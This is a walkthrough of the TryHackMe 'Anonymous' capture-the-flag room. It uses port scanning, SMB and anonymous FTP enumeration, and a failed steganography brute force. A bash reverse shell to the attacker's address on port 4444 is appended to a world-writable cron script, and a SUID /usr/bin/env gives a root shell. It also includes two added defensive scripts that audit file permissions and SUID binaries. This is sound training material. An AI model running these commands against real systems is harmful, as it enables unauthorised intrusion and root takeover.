Anonymous
This is a free room on the TryHackMe platform created by NamelessOne. It is rated medium difficulty and tests one's understanding of Linux fundamentals by asking for two flags: the user flag and the root flag.
Where you see the variable $victim in the commands below, it holds the IP of the victim machine, set in the attacker's shell before starting:
> victim=10.10.168.207
Let's start with enumeration, using Rustscan to find open ports and handing the options after -- to nmap for service and script scanning:
> rustscan -a $victim -r 1-65535 -- -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/home/bob/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.168.207:21
Open 10.10.168.207:22
Open 10.10.168.207:139
Open 10.10.168.207:445
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-21 18:08 EAT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating Ping Scan at 18:08
Scanning 10.10.168.207 [2 ports]
Completed Ping Scan at 18:08, 0.17s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:08
Completed Parallel DNS resolution of 1 host. at 18:08, 0.01s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 18:08
Scanning 10.10.168.207 [4 ports]
Discovered open port 139/tcp on 10.10.168.207
Discovered open port 445/tcp on 10.10.168.207
Discovered open port 22/tcp on 10.10.168.207
Discovered open port 21/tcp on 10.10.168.207
Completed Connect Scan at 18:08, 0.17s elapsed (4 total ports)
Initiating Service scan at 18:08
Scanning 4 services on 10.10.168.207
Completed Service scan at 18:08, 11.60s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.168.207.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:08
NSE: [ftp-bounce 10.10.168.207:21] PORT response: 500 Illegal PORT command.
Completed NSE at 18:08, 7.28s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 1.71s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Nmap scan report for 10.10.168.207
Host is up, received conn-refused (0.17s latency).
Scanned at 2021-05-21 18:08:26 EAT for 22s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.16.238
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDCi47ePYjDctfwgAphABwT1jpPkKajXoLvf3bb/zvpvDvXwWKnm6nZuzL2HA1veSQa90ydSSpg8S+B8SLpkFycv7iSy2/Jmf7qY+8oQxWThH1fwBMIO5g/TTtRRta6IPoKaMCle8hnp5pSP5D4saCpSW3E5rKd8qj3oAj6S8TWgE9cBNJbMRtVu1+sKjUy/7ymikcPGAjRSSaFDroF9fmGDQtd61oU5waKqurhZpre70UfOkZGWt6954rwbXthTeEjf+4J5+gIPDLcKzVO7BxkuJgTqk4lE9ZU/5INBXGpgI5r4mZknbEPJKS47XaOvkqm9QWveoOSQgkqdhIPjnhD
| 256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPjHnAlR7sBuoSM2X5sATLllsFrcUNpTS87qXzhMD99aGGzyOlnWmjHGNmm34cWSzOohxhoK2fv9NWwcIQ5A/ng=
| 256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDHIuFL9AdcmaAIY7u+aJil1covB44FA632BSQ7sUqap
139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: -1s
| nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| ANONYMOUS<00> Flags: <unique><active>
| ANONYMOUS<03> Flags: <unique><active>
| ANONYMOUS<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 59762/tcp): CLEAN (Couldn't connect)
| Check 2 (port 14879/tcp): CLEAN (Couldn't connect)
| Check 3 (port 35330/udp): CLEAN (Failed to receive data)
| Check 4 (port 63992/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: anonymous
| NetBIOS computer name: ANONYMOUS\x00
| Domain name: \x00
| FQDN: anonymous
|_ System time: 2021-05-21T15:08:39+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-21T15:08:39
|_ start_date: N/A
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.48 seconds
Notice that SMB is running on port 445 and that nmap's smb-security-mode script already got in with the guest account. We can enumerate the shares with smbmap to see which ones are readable without credentials:
> smbmap -H $victim
Guest session IP: 10.10.168.207:445 Name: 10.10.168.207
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
pics READ ONLY My SMB Share Directory for Pics
IPC$ NO ACCESS IPC Service (anonymous server (Samba, Ubuntu))
So there is one share, pics, that we can read as guest and that may hold useful information. Let's connect to it with smbclient and see what's in it:
> smbclient -U guest \\\\$victim\\pics
Enter WORKGROUP\guest's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun May 17 14:11:34 2020
.. D 0 Thu May 14 04:59:10 2020
corgo2.jpg N 42663 Tue May 12 03:43:42 2020
puppos.jpeg N 265188 Tue May 12 03:43:42 2020
20508240 blocks of size 1024. 13306808 blocks available
smb: \> download corgo2.jpg puppos.jpeg
download: command not found
smb: \> get puppos.jpeg
getting file \puppos.jpeg of size 265188 as puppos.jpeg (150.7 KiloBytes/sec) (average 150.7 KiloBytes/sec)
smb: \> get corgo2.jpg
getting file \corgo2.jpg of size 42663 as corgo2.jpg (38.9 KiloBytes/sec) (average 39.2 KiloBytes/sec)
smb: \> exit
Running exiftool over the two files does not reveal anything obviously useful at first, so the next hypothesis is that data has been hidden inside the images with steganography.
Let's use steghide to examine the files:
> steghide info corgo2.jpg
"corgo2.jpg":
format: jpeg
capacity: 2.4 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!
> steghide info puppos.jpeg
"puppos.jpeg":
format: jpeg
capacity: 13.6 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!
Both files prompt for a passphrase, so anything embedded in them is protected. Going back over the exiftool output, one attribute on puppos.jpeg holds a long list of words that looks like a candidate wordlist for brute-forcing that passphrase.
For the brute force we use stegseek with this wordlist.
# Re-examining the exiftool contents of the puppos.jpeg file shows a list of words on the Keywords attribute:
> exiftool puppos.jpeg | grep Keywords
Keywords : animal, dog, pembroke, corgi, welsh, cute, canine, happy, breed, portrait, pedigree, grass, posing, outdoor, happiness, nature, friend, green, funny, summer, beautiful, looking, color, purebred, adorable, playing, brown, smile, smiling, fun, standing, small, friendly, cheerful, young, view, background, park, life, little, walk, tongue, enjoy, pet, ears, pretty, domestic, lovely, horizontal, sun, grass, park, portrait
# Turn the Keywords value into one word per line, saved as 'wordlist.txt', for the brute force.
# -s3 prints only the tag value, tr -d strips the spaces after the commas, sort -u drops the
# repeated words (grass, park, portrait appear twice).
# (The original run used "tr [:space:] -d", which translates whitespace to the letter d rather
# than deleting it, so every entry came out with a stray leading d, e.g. "danimal".)
> exiftool -Keywords -s3 puppos.jpeg | tr -d ' ' | tr ',' '\n' | sort -u | tee wordlist.txt
adorable
animal
background
beautiful
breed
brown
canine
cheerful
color
corgi
cute
dog
domestic
ears
enjoy
friend
friendly
fun
funny
grass
green
happiness
happy
horizontal
life
little
looking
lovely
nature
outdoor
park
pedigree
pembroke
pet
playing
portrait
posing
pretty
purebred
small
smile
smiling
standing
summer
sun
tongue
view
walk
welsh
young
# Use stegseek to bruteforce the image files:
> stegseek corgo2.jpg wordlist.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[!] error: Could not find a valid passphrase.
> stegseek puppos.jpeg wordlist.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[!] error: Could not find a valid passphrase.
The wordlist turned out to be a dead end and the images a rabbit hole. Going back to the enumeration data, the server also exposes FTP on port 21, and nmap had already reported that anonymous login is allowed and that the scripts directory is writable (ftp-anon: "Anonymous FTP login allowed", "[NSE: writeable]"). Logging in as anonymous gives access to a number of files:
> ftp $victim 21
Connected to 10.10.168.207.
220 NamelessOne's FTP Server!
Name (10.10.168.207:bob): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xrwx 1 1000 1000 314 Jun 04 2020 clean.sh
-rw-rw-r-- 1 1000 1000 6622 May 21 16:47 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
226 Directory send OK.
ftp> get clean.sh
local: clean.sh remote: clean.sh
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for clean.sh (314 bytes).
226 Transfer complete.
314 bytes received in 0.00 secs (202.6706 kB/s)
ftp> get removed_files.log
local: removed_files.log remote: removed_files.log
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for removed_files.log (6622 bytes).
226 Transfer complete.
6622 bytes received in 0.01 secs (761.0683 kB/s)
ftp> get to_do.txt
local: to_do.txt remote: to_do.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for to_do.txt (68 bytes).
226 Transfer complete.
68 bytes received in 0.00 secs (39.3869 kB/s)
ftp> exit
221 Goodbye.
What stands out is that removed_files.log is dated the day of the engagement while the other files are from 2020, so something is writing to it regularly; clean.sh looks like the housekeeping script doing that, most likely run from a cron job. Crucially, clean.sh is world-writable (-rwxr-xrwx) and sits in a world-writable directory (drwxrwxrwx), so the anonymous FTP user can change what the cron job executes.
Working with this assumption, we append a bash reverse shell to clean.sh and upload it back into the scripts directory. We then start a listener on the attacker machine and wait for the cron job to run the modified script, which connects back to us with a shell as the user the job runs as. Listing that user's home directory reveals the user.txt flag.
# Append a bash reverse shell to clean.sh; 10.11.16.238 is the attacker's VPN address (the one the FTP server reported in ftp-syst) and 4444 the listener port
> echo "bash -c 'exec bash -i &>/dev/tcp/10.11.16.238/4444 <&1'" >> clean.sh
# Upload the script back into the ftp folder
> ftp $victim 21
Connected to 10.10.71.50.
220 NamelessOne's FTP Server!
Name (10.10.71.50:bob): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd scripts
250 Directory successfully changed.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xrwx 1 1000 1000 314 Jun 04 2020 clean.sh
-rw-rw-r-- 1 1000 1000 1591 May 21 20:52 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
226 Directory send OK.
ftp> put clean.sh
local: clean.sh remote: clean.sh
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
394 bytes sent in 0.00 secs (244.1406 kB/s)
ftp> exit
221 Goodbye.
# Establish a listener on the attack machine to listen for the remote shell connection
> nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.11.16.238] from (UNKNOWN) [10.10.71.50] 37128
bash: cannot set terminal process group (1443): Inappropriate ioctl for device
bash: no job control in this shell
namelessone@anonymous:~$
# List the contents of the home directory to find the user.txt flag.
namelessone@anonymous:~$ ls
ls
pics
user.txt
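The weakness exploited above is a scheduled script that another user can modify: clean.sh is -rwxr-xrwx inside a drwxrwxrwx directory. The following shell script is an added example, not part of the room or the original writeup. It audits a directory tree for files and directories writable by "others", then applies the fix and re-checks. The scripts directory it inspects is constructed with mktemp to mirror the FTP listing; nothing here touches the target.

```shell
#!/bin/sh
# Added example (not from the room): find inputs to scheduled jobs that
# "others" can write to, then remove that permission. The paths printed come
# from a constructed fixture, not from the target machine.

# Print every regular file or directory under $1 whose mode grants write to
# "others" (octal 002). A world-writable directory is as dangerous as a
# world-writable script: the file can be swapped out even if its own mode
# is strict.
audit_writable() {
    find "$1" \( -type f -o -type d \) -perm -002 2>/dev/null | sort
}

# Strip o+w from everything audit_writable would report.
harden() {
    find "$1" \( -type f -o -type d \) -perm -002 -exec chmod o-w {} + 2>/dev/null
}

# Constructed fixture: a scripts/ directory with the same modes as the FTP
# listing (drwxrwxrwx dir, -rwxr-xrwx clean.sh, -rw-rw-r-- log, -rw-r--r-- todo).
make_fixture() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\nrm -f /tmp/*.tmp\n' > "$dir/clean.sh"
    : > "$dir/removed_files.log"
    : > "$dir/to_do.txt"
    chmod 777 "$dir"
    chmod 757 "$dir/clean.sh"
    chmod 664 "$dir/removed_files.log"
    chmod 644 "$dir/to_do.txt"
    printf '%s\n' "$dir"
}

# Demo: audit, fix, audit again.
fixture=$(make_fixture)
echo "world-writable before hardening:"
audit_writable "$fixture"            # the directory itself and clean.sh
harden "$fixture"
echo "world-writable after hardening:"
audit_writable "$fixture"            # prints nothing
rm -rf "$fixture"
```

Pointing audit_writable at /etc/cron.d, /etc/cron.*/ and the working directories referenced from user crontabs is the quick version of the check linpeas performs later; any hit is a file whose owner is not the only party deciding what the scheduler runs.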
Next, we transfer linpeas.sh to the victim and run it to look for privilege escalation paths. Its SUID check flags /usr/bin/env, a binary that does not normally carry the SUID bit. Since env does nothing more than execute whatever program it is given, a root-owned SUID env lets us start a shell with root privileges and read the root flag.
# One way to get linpeas.sh across: serve it from the attack machine with python3 -m http.server and fetch it on the victim with wget or curl.
# Extract of the linpeas.sh output is shown below.
> chmod +x linpeas.sh && ./linpeas.sh
...
════════════════════════════════════╣ Interesting Files ╠════════════════════════════════════
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-xr-x 1 root root 44K May 7 2014 /snap/core/9066/bin/ping6
-rwsr-xr-x 1 root root 44K May 7 2014 /snap/core/9066/bin/ping
-rwsr-xr-x 1 root root 44K May 7 2014 /snap/core/8268/bin/ping6
-rwsr-xr-x 1 root root 44K May 7 2014 /snap/core/8268/bin/ping
-rwsr-xr-x 1 root root 31K Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 35K Jan 18 2018 /usr/bin/env # Here is the program of interest
-rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-- 1 root dip 386K Jun 12 2018 /snap/core/8268/usr/sbin/pppd ---> Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 99K Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
...
# env is SUID root, so anything it executes starts with effective uid 0. -C /root changes into /root first; -p asks the shell to keep the effective uid instead of resetting it to the real uid, as bash does by default.
> /usr/bin/env -C /root /bin/sh -p
> ls
ls
root.txt
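linpeas flagged /usr/bin/env because it is not normally SUID. The check behind that finding is simple enough to run without linpeas: list the SUID binaries and diff them against what the host is expected to have. The script below is an added example, not from the room or the writeup. Its baseline and sample listing are constructed for illustration (the baseline is not any distribution's real SUID set), and the sample listing copies the shape of the linpeas excerpt above.

```shell
#!/bin/sh
# Added example (not from the room): report SUID binaries that are absent from
# an expected baseline. BASELINE and SAMPLE_LISTING are constructed for the demo.

# Constructed baseline: paths this host is expected to have SUID, one per line.
BASELINE='/bin/fusermount
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device'

# Constructed sample in the same shape as the linpeas / ls -l excerpt.
SAMPLE_LISTING='-rwsr-xr-x 1 root root 31K Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 35K Jan 18 2018 /usr/bin/env
-rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 59K Jan 25 2018 /usr/bin/passwd'

# Live collection: every SUID regular file on the local filesystems under $1.
list_suid() {
    find "${1:-/}" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Reduce ls -l style lines to the path in field 9, which also drops the
# "---> exploit hint" suffixes linpeas appends.
paths_from_listing() {
    awk 'NF >= 9 { print $9 }'
}

# Read observed SUID paths on stdin; print those not present in BASELINE.
unexpected_suid() {
    base=$(mktemp)
    printf '%s\n' "$BASELINE" | sort -u > "$base"
    sort -u | grep -vxF -f "$base" || true   # grep exits 1 when nothing is unexpected
    rm -f "$base"
}

# Demo on the constructed listing: prints /usr/bin/at and /usr/bin/env,
# the two binaries that would deserve a look on this host.
printf '%s\n' "$SAMPLE_LISTING" | paths_from_listing | unexpected_suid

# Against a real host you would instead run:  list_suid / | unexpected_suid
```

The baseline has to come from a known-good build of the same image; taking it from the host under review would bake the planted env into the "expected" set.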
And with that the room is complete!